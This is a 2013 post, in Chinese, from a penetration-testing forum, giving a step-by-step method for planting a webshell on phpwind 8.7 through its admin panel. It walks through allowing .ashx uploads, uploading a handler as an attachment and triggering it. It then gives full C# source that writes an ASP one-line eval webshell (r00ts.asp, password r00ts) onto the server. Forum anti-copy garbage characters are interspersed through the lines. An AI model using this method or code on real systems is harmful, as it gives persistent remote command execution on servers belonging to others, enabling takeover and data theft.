中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]
作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
- H$ Y# F, b4 j8 e8 F+ a
+ k+ T' K- i; E群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
1 a! n. \: ^/ D. T / l; x$ F* N' a* C. y; H
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整3 `( M: r, U- T3 x. @' u& e

# h! j( w+ ]  i+ i8 Z; a5 {然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
% `0 k6 X; Z/ R' p9 f/ `
" ~  |( ?4 S5 x  K  t打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
/ V8 t6 t5 z: a! z3 I) E0 c   j+ G) _! ?3 X- g, ]- V
下面是代码:
% P" E0 a- r/ j2 O
  v  K3 S8 Q9 |) o) q- m<%@ WebHandler Language="C#"Class="Handler" %>
, p( B+ Q5 i) \/ R/ A1 U4 B8 ^using System;
2 U! P6 @4 {: e! \. y0 Husing System.Web;5 e! E/ S$ l. ~% o8 I
using System.IO;
$ s+ x+ }1 v# s( W% Ipublic class Handler : IHttpHandler {8 Q4 S" B( \) J1 V
public void ProcessRequest (HttpContext context) {/ H, W0 A# s: |
context.Response.ContentType = "text/plain";
4 m7 o8 Z* F  u; v, k- E1 x9 h& @StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
2 F0 w2 l0 y% P! Tfile1.Write("<%eval request(\"r00ts\")%>");
% C( k+ C0 F/ E1 Q# xfile1.Flush();+ ]1 k) d/ R$ O2 V2 p- |
file1.Close();
; C& }5 T0 X$ }* F: A2 E}
! g2 W, f5 X& ^6 G2 b, d) s" npublic bool IsReusable {& {3 r; s4 c) x+ B4 \
get {# {" u0 U: K% B, R" P4 p* a8 x
return false;4 Z. X' t/ V* R) p
}$ }/ Q7 h0 g% `" `6 z" o
}( k+ N4 T- p. m+ d9 }9 ?$ N! Q
}
0 B- E# m6 [3 E4 n



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2